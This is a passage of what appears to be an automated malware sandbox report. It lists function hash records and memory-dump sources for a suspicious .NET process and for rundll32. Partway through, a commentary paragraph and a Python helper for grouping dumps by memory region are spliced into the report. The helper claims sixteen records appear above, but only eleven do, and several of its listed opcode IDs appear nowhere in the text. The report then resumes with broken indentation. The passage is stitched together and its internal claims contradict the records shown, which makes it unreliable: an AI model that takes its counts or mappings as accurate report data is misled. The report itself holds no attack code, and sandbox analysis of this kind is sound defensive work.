• Opcode ID: 8bf0ccaa7e26fa7dcfb2a314103fc81b31f2d022ab1284ff777383780efa358f
• Instruction ID: 25b331b83e6c6e43014fd08b15f342345dc54a93c9f956b4c10ae6cb8a1e7f03
• Opcode Fuzzy Hash: 8bf0ccaa7e26fa7dcfb2a314103fc81b31f2d022ab1284ff777383780efa358f
• Instruction Fuzzy Hash: 1AE022357067443BD7225225EC0AB1BBFAAEBC6B10F24402AE40897781CE68A802C384
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cea3c2190d72a656c5e31b5d6a6599e92551fa0119b47e2ffa8e655930ba5d8d
• Instruction ID: cb752bf192cafc90c87cf11d49f65b06b7fbdd2f3999e211e03924eb3e9571b2
• Opcode Fuzzy Hash: cea3c2190d72a656c5e31b5d6a6599e92551fa0119b47e2ffa8e655930ba5d8d
• Instruction Fuzzy Hash: 46F08CB0A142449FCB80DF78C940559BBF0EB0A215B2889EAD80DDB211E732DA02CB81
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d83440d1edfaff2e2660804958d2c85cd575615470be789aa0ccad9ed0fc69d3
• Instruction ID: b501fd74e151547149a1d6336478a99508471d8c0d4e6e3b321253ed4ad1cf55
• Opcode Fuzzy Hash: d83440d1edfaff2e2660804958d2c85cd575615470be789aa0ccad9ed0fc69d3
• Instruction Fuzzy Hash: FEF08274C00219DFDB90DFACC9467AEBFF1AB05210F940669E514E3281D775CA818FC5
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 970245e7b459fef4efcd698cedcae228f2b47ca263bc3959f1afabed2ca485a5
• Instruction ID: 2a57ba4fbf9c59b65a24776c33a50a8c9d4a5b81287db76ddde0b5f19ac1ceb1
• Opcode Fuzzy Hash: 970245e7b459fef4efcd698cedcae228f2b47ca263bc3959f1afabed2ca485a5
• Instruction Fuzzy Hash: 39E0ED74D1120CAFCB54DFA8D4457ADBBB4EB44301F8084B9E408E7750EA345A558B80
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed81e50e8ebbb604189592c6620c215c68cec0b15f27aad4c84ec058e4540e67
• Instruction ID: a68e30cfc67db66216060d4b9878091d078c00daefcea255d7998b601894934a
• Opcode Fuzzy Hash: ed81e50e8ebbb604189592c6620c215c68cec0b15f27aad4c84ec058e4540e67
• Instruction Fuzzy Hash: A7F01C74D0420DDFCB90DFACD5457AEBFF1AB08210F1006A9E918E3291D7718A808FC5
Memory Dump Source
• Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac3fc69272719fb5bdf78e98eefb7b669cffc391bbd40436a34d5680a5f9b717
• Instruction ID: b7e2c2c4c114287479908ac9bfaf06e82e7f104030e5bd0bfeb0441a80975af2
• Opcode Fuzzy Hash: ac3fc69272719fb5bdf78e98eefb7b669cffc391bbd40436a34d5680a5f9b717
• Instruction Fuzzy Hash: 0DE04F3574675477D3265615AC05F1ABBAAABCAA10F204069E5099B780CE65AC02C794
Memory Dump Source
• Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e39b12e80a0e1f71bda1837eaf1617e43ba33238d1bec3d7988b0f6dd085f269
• Instruction ID: 500de36f549139602bd0365cd563929578e1b839edd9b82ad0a0b96173fd07cc
• Opcode Fuzzy Hash: e39b12e80a0e1f71bda1837eaf1617e43ba33238d1bec3d7988b0f6dd085f269
• Instruction Fuzzy Hash: 46E08C33F0A1175B8B10A11C9C41D65B6DAD78A278B3C8671F828C7380FA29CC0383E0
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca7fd533214406c62564cea2e02009c1efd22e3ac1ad54faa2decd013230e97e
• Instruction ID: bb0c7d795e37d96d68402e6c6abc098bfa31ab3778c5d32e615b7840f23e6786
• Opcode Fuzzy Hash: ca7fd533214406c62564cea2e02009c1efd22e3ac1ad54faa2decd013230e97e
• Instruction Fuzzy Hash: 74E01230505249DFCB02DF78D95458C7BBAEF46204B5284D9D848DB251D7321E00DB51
Memory Dump Source
• Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f584f9c7a15847d028611d4c2ea992896b58db8eb685c8530053fbde4e7825d4
• Instruction ID: a3387f4136dc083aa32b4950324cf68e205df53349790117a0e3ddb9ae2adc3e
• Opcode Fuzzy Hash: f584f9c7a15847d028611d4c2ea992896b58db8eb685c8530053fbde4e7825d4
• Instruction Fuzzy Hash: BCE0DF317402008FC708AA78EA1A71A3BD2EB88216B5444BDD00ADB751CE38DC42CB81
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ddf5bfa1f2b473196889c61b817962f3c759681e3614483e4aad8d48922c9e9
• Instruction ID: 33e2effc9a20893218b76076479482d8215a9129d2d19fec96408f061478e2fa
• Opcode Fuzzy Hash: 2ddf5bfa1f2b473196889c61b817962f3c759681e3614483e4aad8d48922c9e9
• Instruction Fuzzy Hash: 19E09271A1A2899FCB52CBA4DA5019D7F74AE86100B2441EAD404D7246E6355E109712
Memory Dump Source
• Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17fd4b20ee9e48236ab4379f60b60f3a363501a4421eac51258c10070edd7e41
• Instruction ID: 8265de6efb3deeb8f9adf384ede1e0f8e5113a2058d7a231d93369165cfd61e5
• Opcode Fuzzy Hash: 17fd4b20ee9e48236ab4379f60b60f3a363501a4421eac51258c10070edd7e41
• Instruction Fuzzy Hash: 4BE0C2303002148FC708BB38E81845A77DAEB8821531044BCE409D7351CF39EC82CBC1
Memory Dump Source
• Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
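Every function record in this part of the report was carved from one of two memory dumps, 01C50000 and 05F60000, both marked "based on PE: false". As an added example (not code from Joe Sandbox or from the analysed sample), the Python helper below decodes the Source File names copied from these sixteen records and groups the carved functions by region, so an analyst can see at a glance how much code was lifted from memory that no mapped image backs. The process index, analysis step and base address fields are confirmed by the report itself (they recur in the Snapshot File name and in the Offset column); treating the fifth dotted field as a Win32 page-protection value is an assumption, and the remaining fields are left undecoded because the report gives no way to confirm their meaning.

```python
"""Triage helper: decode Joe Sandbox .sdmp source names and group carved functions by region.

Added example; not code from Joe Sandbox or from the analysed sample.
"""
import re

# Source File names copied from the sixteen records above. Constructed from the report text.
DUMP_1C50 = "00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp"
DUMP_5F60 = "00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp"

# (first 8 hex digits of the record's Opcode ID, its Source File), in report order.
RECORDS = [
    ("4c923f38", DUMP_1C50), ("763f916e", DUMP_5F60), ("430c391b", DUMP_1C50),
    ("887d5df2", DUMP_5F60), ("8bf0ccaa", DUMP_1C50), ("cea3c219", DUMP_1C50),
    ("d83440d1", DUMP_1C50), ("970245e7", DUMP_1C50), ("ed81e50e", DUMP_5F60),
    ("ac3fc692", DUMP_5F60), ("e39b12e8", DUMP_1C50), ("ca7fd533", DUMP_5F60),
    ("f584f9c7", DUMP_1C50), ("2ddf5bfa", DUMP_5F60), ("17fd4b20", DUMP_1C50),
    ("3e1bdba3", DUMP_5F60),
]

# Win32 page-protection values from winnt.h. ASSUMPTION: the fifth dotted field of the
# .sdmp name is the region's page protection; the report does not label that field.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"^(?P<proc>{HEX8})\.(?P<step>{HEX8})\.(?P<seq>\d+)\.(?P<base>[0-9A-Fa-f]{{16}})\."
    rf"(?P<prot>{HEX8})\.(?P<f6>{HEX8})\.(?P<f7>{HEX8})\.(?P<f8>{HEX8})\.sdmp$"
)


def parse_sdmp(name: str) -> dict:
    """Split a Joe Sandbox memory-dump file name into its dotted fields.

    proc, step and base are confirmed by the report: they reappear in the Snapshot File
    name (hcaresult_<proc>_<step>_<base>_...) and base matches the 'Offset:' column.
    Fields 6-8 are returned raw because their meaning is not stated anywhere on the page.
    """
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox memory dump name: {name!r}")
    prot = int(m["prot"], 16)
    return {
        "proc": int(m["proc"], 16),
        "step": int(m["step"], 16),
        "base": int(m["base"], 16),
        "prot": prot,
        "prot_name": PAGE_PROTECTION.get(prot, f"0x{prot:08X}"),  # assumption, see above
        "executable": bool(prot & EXECUTE_MASK),
        "raw_fields": (m["f6"], m["f7"], m["f8"]),
    }


def snapshot_prefix(name: str) -> str:
    """Rebuild the hcaresult_<proc>_<step>_<base> prefix the report uses for Snapshot File."""
    d = parse_sdmp(name)
    return f"hcaresult_{d['proc']}_{d['step']}_{d['base']:x}"


def group_by_region(records, pe_backed: bool = False) -> dict:
    """Count carved functions per region and flag executable regions no image backs.

    'based on PE: false' is printed on every Source File line above but is not encoded
    in the file name, so it is passed in as a flag rather than parsed.
    """
    regions = {}
    for opcode_id, dump in records:
        info = parse_sdmp(dump)
        entry = regions.setdefault(info["base"], {
            "functions": 0,
            "opcode_ids": [],
            "protection": info["prot_name"],
            # Executable memory without a mapped image behind it is where JIT-emitted or
            # unpacked code lives; that is the region an analyst dumps and disassembles.
            "non_image_executable": info["executable"] and not pe_backed,
        })
        entry["functions"] += 1
        entry["opcode_ids"].append(opcode_id)
    return dict(sorted(regions.items()))


if __name__ == "__main__":
    for base, summary in group_by_region(RECORDS).items():
        print(f"region 0x{base:08X}: {summary['functions']} functions, "
              f"{summary['protection']}, non-image executable={summary['non_image_executable']}")
```

For these records the helper reports nine functions from 0x01C50000 and seven from 0x05F60000, both with protection value 0x40 (PAGE_EXECUTE_READWRITE under the stated assumption) and neither backed by a PE image. For a .NET executable that pattern is consistent with JIT-compiled code, but it is equally the footprint of unpacked code written into fresh memory; the two dumps named in the Source File lines are what settles which, and the snapshot_prefix check lets the analyst tie each dump back to its hcaresult_*.jbxd snapshot without trusting the report's layout.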
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3e1bdba32bc0dd14f73596b3962f1bd04d55df0dc78080cc3fb44053009efff7
                                                                                                                                          • Instruction ID: 720fb3d5ec77d618210045428fe78c67375767bed89c63b042a0be35a73d2347
                                                                                                                                          • Opcode Fuzzy Hash: 3e1bdba32bc0dd14f73596b3962f1bd04d55df0dc78080cc3fb44053009efff7
                                                                                                                                          • Instruction Fuzzy Hash: 9DE09274E0520CAFCB54EFA8D4455ADBBF5EB48301F4081A9E809A7350EA345A04CF81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 807cc01c8471949f9a0df43ecbee1ba4329ee0ca764648eb4afa149a80e4f96c
                                                                                                                                          • Instruction ID: 4a905930a56444a7625e6e39d22b39ce897a957f6146be9f699a8b11f3243c99
                                                                                                                                          • Opcode Fuzzy Hash: 807cc01c8471949f9a0df43ecbee1ba4329ee0ca764648eb4afa149a80e4f96c
                                                                                                                                          • Instruction Fuzzy Hash: 4FE0125280E6E00FD703A728D87129A3FB15F93201F1984D3D0C08B5A7D5184819C2AA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bed8473b6579983f7c74a6b2aa0234d0580a28a670667538f6ddb73fbfeb229f
                                                                                                                                          • Instruction ID: 14ace596f22e4d6548b5547307e5e690dfd415d50806fa1c6f7e493afaf0c85c
                                                                                                                                          • Opcode Fuzzy Hash: bed8473b6579983f7c74a6b2aa0234d0580a28a670667538f6ddb73fbfeb229f
                                                                                                                                          • Instruction Fuzzy Hash: 93D01730A0120DEBCB05EFA8E90169DB7F9EF84600B1085E9E808D7200EB312E00DB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: feb4660b8dfc5cf3d94e9c8d68c83cfcb6cd3f171da9dac8aa96ed99b892438b
                                                                                                                                          • Instruction ID: 2a47c60255b9b4729889afe96044aabbb34f6e31693b782e26071c0677b18309
                                                                                                                                          • Opcode Fuzzy Hash: feb4660b8dfc5cf3d94e9c8d68c83cfcb6cd3f171da9dac8aa96ed99b892438b
                                                                                                                                          • Instruction Fuzzy Hash: 56D05B30A1210DEFCB00DFE4E94159DB7F9FB45200B5095E9D408D3240EA715F109750
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c3c092813db5c58180f07a14c79266df571a109b7da48412a95846044bbf6b31
                                                                                                                                          • Instruction ID: 02852d6c4458ecf90a1dc66a9e11262861421a76423edc8cc21944ed08396f38
                                                                                                                                          • Opcode Fuzzy Hash: c3c092813db5c58180f07a14c79266df571a109b7da48412a95846044bbf6b31
                                                                                                                                          • Instruction Fuzzy Hash: E5D02B7550034487CF105A24D4053163B56BB41254FA80248F455876C2EA22E40387D1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 99609fba90a48a5d601e405b0d18742bde14f5af517dfca70362c07947535390
                                                                                                                                          • Instruction ID: d0f4e6a60227e968c5975895a6b0b843bef2c9caf029c14ddb80aea88b657259
                                                                                                                                          • Opcode Fuzzy Hash: 99609fba90a48a5d601e405b0d18742bde14f5af517dfca70362c07947535390
                                                                                                                                          • Instruction Fuzzy Hash: 51D05E30A0120DEFCB00EFB8E95159DBBF9FB44200B5085EAE408D3211EB312F009B90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a177509a97dd48be51c008fe583ac2744612f4ed07ed2394461607e76ce173cc
                                                                                                                                          • Instruction ID: 266f992271fa8ce0fa83cf2f197171279e3e723e7563a19a5a39a3f278fbb7fd
                                                                                                                                          • Opcode Fuzzy Hash: a177509a97dd48be51c008fe583ac2744612f4ed07ed2394461607e76ce173cc
                                                                                                                                          • Instruction Fuzzy Hash: 73C012311497C64EC7035764F856C593F35DD5112231547E6E124890E2D95C494DD319
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3a54b40e8b2b0a8e216709bb6b05ea020e5a5bdae5e8e6c73d3b221ac920011d
                                                                                                                                          • Instruction ID: 773dd804356158c0b79c7d6e7c37c9ad7e392b663eac21bf8103df4f03b07d38
                                                                                                                                          • Opcode Fuzzy Hash: 3a54b40e8b2b0a8e216709bb6b05ea020e5a5bdae5e8e6c73d3b221ac920011d
                                                                                                                                          • Instruction Fuzzy Hash: CFB092B094630CAF8620DA99980186ABBACDA0A210B0041E9F90C87320D972A91056D1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 73281c8e7d38b462a694b88c4115bb9b10f9a1446c10bc3432340e64618e5ec6
                                                                                                                                          • Instruction ID: 2c8b051c38b707b78c1d0189b6fa112eb40089b7771c8276c771341e58a938bb
                                                                                                                                          • Opcode Fuzzy Hash: 73281c8e7d38b462a694b88c4115bb9b10f9a1446c10bc3432340e64618e5ec6
                                                                                                                                          • Instruction Fuzzy Hash: 9DC04C36A0400D9B9F00DB85F4454DCF731FB84225B204162D515A35009A3129178B80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 909805465d5d14b2bba26471b18db403dea9ba9bf4514c4b189d0bf46aa3a2d4
                                                                                                                                          • Instruction ID: 8b542aaf306efec9b5a37875725b26d55998f3eb89c22e32ab843517b08ad856
                                                                                                                                          • Opcode Fuzzy Hash: 909805465d5d14b2bba26471b18db403dea9ba9bf4514c4b189d0bf46aa3a2d4
                                                                                                                                          • Instruction Fuzzy Hash: 82C08C308081404BDB00DA20DA36B563B21B781300F508020D0C156305CB2CC802CA59
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 59871856c49eb7eeec7fe06259bc7945b7012583047bac621740c4e6fa58310a
                                                                                                                                          • Instruction ID: 08f596c11c39e671fcfa2d86cd3bf557fa852d2569546b059448c7de5c3ee705
                                                                                                                                          • Opcode Fuzzy Hash: 59871856c49eb7eeec7fe06259bc7945b7012583047bac621740c4e6fa58310a
                                                                                                                                          • Instruction Fuzzy Hash: 56B0123104031F4BC70167A4F805A853FBCE580206B90D510F10C05012AEAC2C488694
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 72bcc448e2fe7f808a5a17afbd1fddaa90e3a5159080482b1448bf85cfaf884a
                                                                                                                                          • Instruction ID: 8d797675b448204f9ef53a9a6c4d94c232613cd017d35c966cd732b1829f2277
                                                                                                                                          • Opcode Fuzzy Hash: 72bcc448e2fe7f808a5a17afbd1fddaa90e3a5159080482b1448bf85cfaf884a
                                                                                                                                          • Instruction Fuzzy Hash: 5FB01221A1001557DD489175CD8A3673E76D7C5B00F94844CC2044B3D5E52DCC048741
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7d0466dde20020a2c981ed29e71881cb884ae9e043bbcf1adf68885bf97e28bc
                                                                                                                                          • Instruction ID: 8212b74c4cab595438d767fed1248453050578f5152f172ae439152758435029
                                                                                                                                          • Opcode Fuzzy Hash: 7d0466dde20020a2c981ed29e71881cb884ae9e043bbcf1adf68885bf97e28bc
                                                                                                                                          • Instruction Fuzzy Hash: 97B01234101100D7C3049730C4430143A23AAD21053D488DC808009350C73FC413C702
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dc7e940390c3b144e84de8e9f1bc829e068011f98b8d6fcd013c70280eaca563
                                                                                                                                          • Instruction ID: 8dcad24a9a542c4f3a0efc697dabe4f108bc1571ac1a31f99f99ddb2fff40cd4
                                                                                                                                          • Opcode Fuzzy Hash: dc7e940390c3b144e84de8e9f1bc829e068011f98b8d6fcd013c70280eaca563
                                                                                                                                          • Instruction Fuzzy Hash: F422FA34B012148FDB19EB38C854A5DB7F2EF89214F5585A9E50A9B3A2DB39DD82CF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a9683608ca3920e565b4ddaba73fc2162d6b5eabe7d501f916b2c897900963e4
                                                                                                                                          • Instruction ID: 7f1ffe6a185af68f51d12c2c5b9a0119502655a11a902bf4f5bf591a6c96c5aa
                                                                                                                                          • Opcode Fuzzy Hash: a9683608ca3920e565b4ddaba73fc2162d6b5eabe7d501f916b2c897900963e4
                                                                                                                                          • Instruction Fuzzy Hash: A0217D7252539EAFE712E26128003F63F69DF12220F04C5AFF94C8A053CC288994D3D2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 07737ac0b15852b29c2093a830f6f38a6d210184cf689fdbed1cd9748cdccb5a
                                                                                                                                          • Instruction ID: c6a35203a72286f70084301b3b2897dd8a849cca1567fcd87a5e4d7fb4e4b65e
                                                                                                                                          • Opcode Fuzzy Hash: 07737ac0b15852b29c2093a830f6f38a6d210184cf689fdbed1cd9748cdccb5a
                                                                                                                                          • Instruction Fuzzy Hash: EE31D478A11109DFCB14DFA9D58499EBBF6FF98310B14816AE805EB361DB30EC41CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 828c3312464042955e72391388c78d342dc013da6830d95195d3afa5bd272d46
                                                                                                                                          • Instruction ID: 174b972191e895dba3e73013b0054dc8d83eb1eed297768a42f5a67896e9eed7
                                                                                                                                          • Opcode Fuzzy Hash: 828c3312464042955e72391388c78d342dc013da6830d95195d3afa5bd272d46
                                                                                                                                          • Instruction Fuzzy Hash: C52121B1720207DFDB04DA6998407BF37EAFF95214F10462DE006DB298DE3488418390
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cf35bd8fa1baee632a96873855fd599346ca607b2132acd4dd64cc1399e01daa
                                                                                                                                          • Instruction ID: b7be785786d12cc4410e01243deb955bf07f2eedd6e7c27b0ed5c5d872110e67
                                                                                                                                          • Opcode Fuzzy Hash: cf35bd8fa1baee632a96873855fd599346ca607b2132acd4dd64cc1399e01daa
                                                                                                                                          • Instruction Fuzzy Hash: 1E2178B17282029BD715A666545477F3BA6DFD2310F00816AE949CB281DE389C81C3A2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 773fa6b1642e2c10af9622b417003aae3b2f7a57c9af23600b7ea120f04a3856
